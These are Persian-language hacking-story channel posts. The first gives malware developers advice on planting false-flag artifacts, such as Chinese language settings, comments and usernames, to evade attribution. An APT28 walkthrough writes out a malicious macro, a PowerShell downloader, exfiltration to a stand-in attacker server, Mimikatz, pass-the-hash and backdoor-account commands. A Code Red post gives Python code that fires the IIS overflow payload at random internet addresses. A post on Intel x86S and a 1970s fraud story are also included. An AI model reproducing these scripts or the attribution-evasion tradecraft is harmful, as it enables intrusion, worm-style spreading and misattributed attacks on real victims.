دوستان ما قصد داریم این داستان ها رو به صورت پادکست قرار بدیم تا راحت تر باشید گوش بدید در هرجایی که هستید و فرصت یا موقعیت خوندن نیست از علاقه مندان درخواست می شود در صورت تمایل به درست کردن پادکست در این خصوص به ما پیام دهند :

@TryHackBoxStorybot

قوانین APT ها برای توسعه بدافزار چیه؟

یکی از دوستان داخل لینکدین پستی در خصوص سیمبول فایل ها گذاشته  بود که به هنگام کامپایل یک قطعه کد توسط visual studio  این symbol فایل ایجاد میشه و پیشنهاد کرده بودند که برای اینکه کار تحلیل گران بدافزار و ... رو سخت تر کنیم بهتره که این مورد رو پاک کنیم.

یادم اومد چند سال پیش که تماما تمرکزم روی بدافزار و سندباکس بود، چندتا الزام یا پیش‌نیاز برای توسعه بدافزار وجود داشت که هر توسعه دهنده ای باید رعایت میکرد ، از این جهت چندتاشون رو اینجا تیتر وار میگم که شما هم گوشه ذهنتون داشته باشید
موارد بسیاره، و من تنها به دو سه مورد ابتدایی ولی مهمش اشاره میکنم.

شما باید فارنزیک سیستم عاملی که روش کد می زنید رو کامل بدونید (ویندوز، لینوکس و ..) و براساس اون بدافزار تون رو توسعه بدید ... به طور کلی ویندوز کلی Artifact  از شما در فایل های کامپایل شدتون به جا می زاره که در فاز ردیابی مهاجم استفاده خواهد شد.

مثلا هر زبانی روی سیستم تون نصب باشه، تو متادیتا های کامپایل کد بدافزار تون ی اثری ازش می افته.  یک راه حلش این بود که روی سیستم clean تون زبان چینی یا ... نصب کنید.
کدهایی که توسعه می دید رو با کامنت های چینی یا هر زبانی غیر از فارسی بذارید.
اطلاعات مربوط به تایم زون سیستم تون روی تهران نباشه.
حساب کاربری تون یا اسامی که استفاده می کنید فارسی نباشه. مثلا  mao Zedong (رهبر پیشین چین) گزینه خوبیه :)
و صد البته که روی ماشین اصلی تون که متصل به اینترنت هم هست کد توسعه نمی دید.
و از اون مهم تر تحت هیچ شرایطی ماشین رو به اینترنت وصل نمی کنید و محیط توسعه تون هم بایستی داخل یک vm باشه.
در مورد Best practice  برای ماشین های توسعه دهنده بدافزار هم اینکه هیچ وقت به اینترنت وصل نشن و تمام اپدیت ها آفلاین صورت بگیره.
و از نوت پد یا vi برای توسعه استفاده کنید ، کلا از IDE ها دوری کنید!

به هر حال توسعه بدافزار در دنیای واقعی الزامات بسیاری رو داره که بایستی حتما رعایت کنید.
و خیلی هاش رو هم نمیشه گفت! مثل سرورهای فرماندهی و کنترل تون باید کجا باشن که اگر لیک شدن به شما نرسن، یا مدارک احراز هویتی تون برای آماده سازی محیط باید از کجا و به چه شکل تهیه بشه و....

✍ منبع : os security
@TryHackBoxStory

📌 بخش اول: تغییرات ISA پردازنده‌های اینتل در معماری x86s

معماری x86 برای سال‌ها در قلب سیستم‌های کامپیوتری بوده است و این معماری با نسخه‌های بهبودیافته در پردازنده‌های اینتل مورد استفاده قرار گرفته است. در این مقاله، به بررسی معماری جدیدی که اینتل تحت عنوان x86S ارائه داده می‌پردازیم. X86S یک مجموعه دستورالعمل‌های معماری جدید و کاهش‌یافته است که از بخش‌های قدیمی و بدون استفاده معماری سنتی x86 خلاص می‌شود و طراحی آن برای مدرن‌سازی و کارایی بیشتر معماری پردازنده‌ها صورت گرفته است.

معماری ISA چیست و چرا نیاز به بهینه‌سازی دارد؟ معماری مجموعه‌ دستورالعمل‌ها یا همان Instruction Set Architecture، مجموعه‌ای از دستورالعمل‌هاست که پردازنده‌ها برای اجرای برنامه‌ها و تعامل با سخت‌افزار از آن استفاده می‌کنند. معماری x86 با گذشت زمان بخش‌های مختلفی را برای سازگاری با سیستم‌های قدیمی‌تر اضافه کرده که باعث پیچیدگی، افزایش مصرف انرژی و کاهش کارایی می‌شود. اینتل با ارائه x86S قصد دارد تا با حذف قابلیت‌های غیرضروری و قدیمی، معماری x86 را بهبود بخشیده و بهینه‌سازی کند.

✅ ویژگی‌های x86S: معماری x86S با کاهش بخش‌های قدیمی و سازگاری‌های اضافی، از ساده‌تر شدن کدهای اجرایی، کاهش پیچیدگی‌ها و مصرف منابع بهره می‌برد. این تغییرات شامل موارد زیر است:

➖ حالت‌های اجرایی قدیمی: x86S از حالت‌های اجرایی قدیمی که در معماری‌های پیشین وجود داشتند، همچون حالت واقعی 16 بیتی و حالت محافظت‌شده 32 بیتی صرف‌نظر کرده و پردازنده را به طور دائم در حالت صفحه‌بندی شده قرار می‌دهد. در نتیجه، تنها حالت 64 بیتی و حالت سازگاری 32 بیتی باقی می‌ماند.

➖ حذف حلقه‌های امنیتی پایین‌تر (Ring 1 و Ring 2): حلقه‌های امنیتی 1 و 2 در گذشته برای جدا کردن سطوح مختلف دسترسی در سیستم‌عامل‌ها استفاده می‌شد، اما امروزه بسیاری از سیستم‌عامل‌ها از این حلقه‌ها استفاده نمی‌کنند. حذف این حلقه‌ها باعث کاهش پیچیدگی و بهبود کارایی پردازنده می‌شود.

➖ حذف حالت‌های 32 بیتی و vm86 در Ring 0: حالت vm86 برای پشتیبانی از برنامه‌های قدیمی DOS و 16 بیتی طراحی شده بود. با حذف این حالت‌ها، پردازنده از پشتیبانی مستقیم برنامه‌های قدیمی بی‌نیاز می‌شود و اجرای برنامه‌های مدرن بهینه‌تر خواهد شد.

➖ حذف MTRRهای ثابت: این حذف باعث می‌شود که پردازنده به مدیریت پویا و کارآمدتری از حافظه دسترسی پیدا کند و پردازنده تنها به ساختارهای مدیریت حافظه پویا متکی باشد.

➖ حذف I/O سطح کاربر و رشته‌های I/O: با حذف این موارد، پردازنده نیازمند پشتیبانی از دستورات سطح پایین ورودی و خروجی که در برنامه‌های قدیمی استفاده می‌شدند، نیست. این کار باعث بهبود کارایی و امنیت پردازنده می‌شود.

➖ حذف و بهینه‌سازی کنترل‌ها و بیت‌های اضافی در CR0: برخی از کنترل‌های اضافی در CR0، مانند Write-Through و بیت‌های کنترل قدیمی FPU که برای پردازنده‌های اولیه طراحی شده بودند، حذف می‌شوند و این باعث کاهش سربار پردازنده و بهینه‌سازی کنترل‌ها می‌شود.

➖ حذف و بهینه‌سازی مکانیزم وقفه‌ها و کنترل‌ها: معماری x86S تنها از x2APIC برای کنترل‌کننده وقفه استفاده می‌کند و از XAPIC و کنترلرهای وقفه قدیمی پشتیبانی نمی‌کند. این تغییرات باعث کاهش مصرف انرژی و بهبود کارایی پردازنده در سیستم‌های چندپردازشی می‌شود.

➖ پشتیبانی محدود از معماری Segmentation: با وجود محدود شدن دسترسی به سگمنت‌های تقسیم‌بندی در حالت 64 بیتی، همچنان دسترسی محدود به FS و GS برای کاربردهای خاص پشتیبانی می‌شود. همچنین، برخی از ویژگی‌های تقسیم‌بندی مانند تغییر حلقه‌ها در دستورهای فراخوانی دوربرد (far call) حذف شده است.

➖ دستورات محدود برای کنترل حالت‌های اجرایی: در معماری x86S، پردازنده نمی‌تواند حالت‌های NX یا SYSCALL یا حالت 64 بیتی را در MSR EFER غیرفعال کند که باعث افزایش امنیت پردازنده می‌شود.

@TryHackBoxStory

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
         ✅نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
         ✅استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
         ✅حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub

🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:

$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
    - بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
    - اجرای دستورات از راه دور (Remote Command Execution)
    - ثبت کلیدهای زده‌شده (Keylogging)
    - آپلود و دانلود فایل‌های مخرب
    - استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:

nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:

privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:

Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"

🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل

$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

#Cyber_Warfar
@TryHackBoxStory

دوستان کسی علاقه مند هست پست های مربوط به داستان های هک بزاره ؟
به ما پیام بده ادمینش کنیم :
@TryHackBoxStorybot

🪱 کد رد (Code Red)

• صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعه‌های نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را می‌نوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام این بدافزار را به یاد نوشیدنی مورد علاقه‌شان، «کد رد» بگذارند. این نام برای بسیاری از قربانیان کرم به یاد ماندنی شد، چرا که در عرض چند روز، کد رد اینترنت را تسخیر کرد.

• چگونگی گسترش کرم: بعدها مشخص شد که گسترش این کرم از ۱۳ ژوئیه ۲۰۰۱ آغاز شده بود. این بدافزار از یک آسیب‌پذیری در وب‌سرور Internet Information Server (IIS) استفاده می‌کرد که مربوط به سرریز بافر (Buffer Overflow) بود. اگرچه مایکروسافت یک ماه قبل از این اتفاق، وصله‌ای برای رفع این آسیب‌پذیری منتشر کرده بود، اما بسیاری از مدیران سیستم‌ها به‌موقع این به‌روزرسانی را نصب نکرده بودند. همین موضوع دلیل اصلی شیوع گسترده این کرم شد.

• آسیب‌پذیری مورد استفاده: کرم اینترنتی از یک آسیب‌پذیری ساده در یکی از ماژول‌های وب‌سرور، به‌طور خاص در بخش افزونه‌ایندکس کردن داده‌ها، سوءاستفاده می‌کرد. در کتابخانه idq.dll یک اشکال مربوط به سرریز بافر وجود داشت. این آسیب‌پذیری با شناسه MS01-33 شناخته می‌شد. با استانداردهای امروزی، این یک اشکال بسیار ساده است که می‌توان با ارسال یک درخواست بسیار طولانی به سرور، آن را مورد سوءاستفاده قرار داد. مثلاً:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

در این درخواست، داده‌های بعد از کاراکترهای N به عنوان دستورات تفسیر و اجرا می‌شوند. تمام کد مخرب در خود درخواست قرار دارد، بنابراین اگر سرور آسیب‌پذیر باشد، بلافاصله و با احتمال ۱۰۰٪ آلوده می‌شود.

• رفتار کرم: رفتار کرم بسته به تاریخ روز متفاوت بود. از روز ۱ تا ۱۹ هر ماه، کرم فقط به گسترش خود می‌پرداخت: با اسکن سرورهای اینترنتی، درخواست‌های مخرب را به آن‌ها ارسال می‌کرد. برای این کار، روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌شد که هر کدام لیستی از کامپیوترهای جدید برای آلوده‌سازی را تولید می‌کردند. از روز ۲۰ تا ۲۷ هر ماه، کرم حملات DDoS را علیه لیستی از آدرس‌های IP که در کد آن تعبیه شده بود، انجام می‌داد. یکی از این آدرس‌ها، مربوط به وب‌سایت کاخ سفید بود.

• اوج شیوع: اگرچه گسترش کرم در ۱۵ ژوئیه ۲۰۰۱ گزارش شد، اما اوج آن در ۱۹ ژوئیه اتفاق افتاد، زمانی که بیش از ۳۵۹ هزار سرور آلوده شده بودند. بعدها، با نصب به‌روزرسانی‌های امنیتی مایکروسافت توسط مدیران سیستم‌ها، شیوع کرم کاهش یافت. البته نسخه دوم کرم با نام Code Red II نیز ظهور کرد که از کاراکترهای X به جای N در درخواست‌های خود استفاده می‌کرد.

• نتیجه‌گیری: از این ماجرا دو درس مهم می‌توان گرفت. اول اینکه نصب به‌موقع وصله‌های امنیتی که ۲۴ سال پیش اهمیت زیادی داشت، هنوز هم موضوعی حیاتی است. دوم اینکه خوش‌شانسی بزرگی بود که کد رد فایل‌ها را رمزنگاری نمی‌کرد، پسوردها را نمی‌دزدید یا داده‌ها را نابود نمی‌کرد. اگر هدف مهاجمان مخرب‌تر بود، عواقب این حمله می‌توانست بسیار فاجعه‌بارتر باشد.

@TryHackBoxStory

تحلیل حمله بر فرض مثال چطوری کرم گسترش پیدا کرده :

۱. روش اصلی حمله: سوءاستفاده از آسیب‌پذیری سرریز بافر (Buffer Overflow)

هدف: وب‌سرورهای Microsoft IIS (Internet Information Services) که نسخه‌های آسیب‌پذیر کتابخانه idq.dll را اجرا می‌کردند.

مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکس‌سازی (Indexing Service) می‌شد:

GET /default.ida?[رشته طولانی از Nها]%u9090%u6858%ucbd3%u7801... HTTP/1.0

رشته Nها باعث سرریز بافر و بازنویسی حافظه می‌شد.

کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم می‌داد.

۲. روش‌های گسترش خودکار

+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرس‌های IP تصادفی را اسکن می‌کرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال می‌نمود.

اسکن تصادفی IPها
کرم Code Red از الگوریتم‌های ساده‌ای برای تولید آدرس‌های IP تصادفی استفاده می‌کرد. در پایتون، این فرآیند را می‌توان به صورت زیر شبیه‌سازی کرد:

import random

def generate_random_ip():
    return ".".join(str(random.randint(0, 255)) for _ in range(4))

# مثال: تولید ۱۰ آدرس IP تصادفی
for _ in range(10):
    print(generate_random_ip())

+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه socket شبیه‌سازی کرد:

import socket

def send_malicious_request(ip):
    try:
        # ایجاد یک سوکت TCP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)  # تنظیم timeout برای اتصال
        sock.connect((ip, 80))  # اتصال به پورت ۸۰
        
        # ارسال درخواست مخرب
        malicious_request = (
            "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\r\n"
            "Host: example.com\r\n"
            "\r\n"
        )
        sock.send(malicious_request.encode())
        
        # دریافت پاسخ (اختیاری)
        response = sock.recv(4096)
        print(f"Response from {ip}: {response.decode()}")
        
        sock.close()
    except Exception as e:
        print(f"Failed to connect to {ip}: {e}")

# مثال: ارسال درخواست به یک IP تصادفی
random_ip = generate_random_ip()
send_malicious_request(random_ip)

تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌کرد تا اسکن و آلوده‌سازی را تسریع کند.

+ ایجاد Threadهای موازی برای اسکن و آلوده‌سازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلوده‌سازی استفاده می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه threading شبیه‌سازی کرد:

import threading

def scan_and_infect(ip):
    print(f"Scanning {ip}...")
    send_malicious_request(ip)

# ایجاد ۹۹ thread موازی
threads = []
for _ in range(99):
    ip = generate_random_ip()
    thread = threading.Thread(target=scan_and_infect, args=(ip,))
    thread.start()
    threads.append(thread)

# منتظر ماندن برای اتمام تمام threadها
for thread in threads:
    thread.join()

---

عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!

جمع‌بندی
این کدها صرفاً برای درک بهتر مکانیزم‌های گسترش کرم Code Red ارائه شده‌اند. امروزه، چنین حملاتی با استفاده از فایروال‌ها، سیستم‌های تشخیص نفوذ (IDS)، و به‌روزرسانی‌های امنیتی به راحتی قابل پیشگیری هستند.

@TryHackBoxStory

داستان بعدی هک بانک با استفاده از روش های مهندسی اجتماعی ...

این داستان هم واقعی هست

اولین کلاهبرداری IT با خسارت مالی قابل توجه

• اولین کلاهبرداری IT با خسارت مالی قابل توجه توسط نورمن هانت در سال ۱۹۷۷ انجام شد. هانت با نام جعلی دیوید وینتروپ، شرکتی به نام DataSync Corp در شهر سانتا ماریا، ایالت کالیفرنیا تأسیس کرد. این شرکت به طور گسترده در مجلات کامپیوتری تبلیغ می‌شد و هانت در این تبلیغات با عکس‌های رنگی و جذاب، تجهیزات کامپیوتری را با قیمت‌های بسیار پایین‌تر از بازار عرضه می‌کرد. اما نکته اینجا بود که این تجهیزات اصلاً وجود خارجی نداشتند و هانت تنها از طریق فروش "هوای گرم" به مشتریان پول به جیب می‌زد.

• در ژوئن ۱۹۷۷، هانت به دلیل کلاهبرداری دستگیر شد و به سه سال زندان محکوم گردید. اما او کمتر از شش ماه در زندان ماند و موفق به فرار شد. پس از فرار، به ایالت آریزونا رفت و نام خود را به جیم اندرسون تغییر داد. سپس شرکتی جدید به نام World Power Systems (WPS) تأسیس کرد.

• هانت دوباره قصد داشت به شیوه‌های قدیمی خود بازگردد و تجهیزات جعلی را با قیمت‌های بسیار پایین تبلیغ کند. اما این بار برخی از علاقه‌مندان به کامپیوتر متوجه شدند که تجهیزات تبلیغ‌شده در عکس‌ها به درستی سرهم‌بندی نشده‌اند و حتی برخی از دستگاه‌ها فاقد اتصالات لازم برای برق بودند! بنابراین، هانت مجبور شد برای مدتی به طور قانونی عمل کند تا اعتماد مشتریان را جلب کند. در این مدت، شرکت WPS سفارشات را دریافت و به موقع ارسال می‌کرد. اما با افزایش حجم سفارشات، هانت دوباره به سراغ شیوه‌های کلاهبرداری رفت.

• او به نام شرکت WPS، نامه‌هایی به مشتریان ارسال می‌کرد و به آن‌ها اطلاع می‌داد که به دلیل کمبود تجهیزات، سفارشات آن‌ها با تأخیر مواجه خواهد شد. در عین حال، شرکت WPS از تأمین‌کنندگان خود درخواست می‌کرد که تجهیزات را به صورت اعتباری یا با تأخیر در پرداخت تحویل دهند. اگر تأمین‌کنندگان موافقت می‌کردند، هانت سفارشات بزرگی برای قطعات گران‌قیمت ثبت می‌کرد و قول می‌داد که پرداخت‌ها را ظرف ۳۰ روز انجام دهد. در نتیجه، انبارهای شرکت پر از تجهیزات می‌شد، اما به مشتریان چیزی تحویل داده نمی‌شد.

• وقتی وضعیت شرکت بحرانی شد و طلبکاران تهدید به شکایت کردند، هانت مرحله بعدی کلاهبرداری خود را آغاز کرد. او حساب‌های بانکی شرکت را خالی کرد و پول‌ها را به حساب‌های شخصی خود انتقال داد. سپس با ایجاد پیچیدگی در لجستیک، تجهیزات را به انبارهای مخفی و مکان‌های غیرقابل ردیابی منتقل کرد تا ردپای خود را از چشم پلیس پاک کند. در نهایت، او یک قربانی پیدا کرد تا تمام تقصیرها را به گردن او بیندازد.

• هانت از قبل یک کارمند ساده‌لوح را انتخاب کرده بود و او را به عنوان رئیس شرکت منصوب کرد. پس از انتقال دارایی‌های شرکت و آماده‌سازی همه چیز برای فرار، هانت به مرخصی طولانی‌مدت رفت و کنترل شرکت را به رئیس جدید سپرد. در حالی که هانت با پول‌ها و تجهیزات دزدیده‌شده از ایالت فرار کرد، پلیس رئیس جدید را در همان روزهای اول دستگیر کرد و تحقیقات را آغاز نمود. این در حالی بود که هانت فرصت کافی برای فرار و ادامه فعالیت‌های مجرمانه خود در ایالت‌های دیگر داشت.

• اما پایان داستان قابل پیش‌بینی بود: هانت دستگیر شد و به زندان افتاد. با این حال، حتی در زندان هم دست از کلاهبرداری برنداشت. این بار او یک نرم‌افزار جعلی به نام "Word Type" را به نگهبانان زندان فروخت. این نرم‌افزار ادعا می‌کرد که شامل ۱۰۰ برنامه مختلف است و قیمت آن تنها ۱۰۹٫۹۵ دلار بود. اما هر کسی که این بسته را خریداری می‌کرد، متوجه می‌شد که برنامه‌ها یا اصلاً اجرا نمی‌شوند یا فقط نسخه‌های تغییر نام یافته‌ای از برنامه‌های موجود هستند.

• پس از افشای این کلاهبرداری، هانت در سال ۱۹۸۱ به یک مرکز اصلاح و تربیت در سن دیگو منتقل شد و ردپای ماجراهای کامپیوتری او برای همیشه ناپدید شد.

بخش اول
@TryHackBoxStory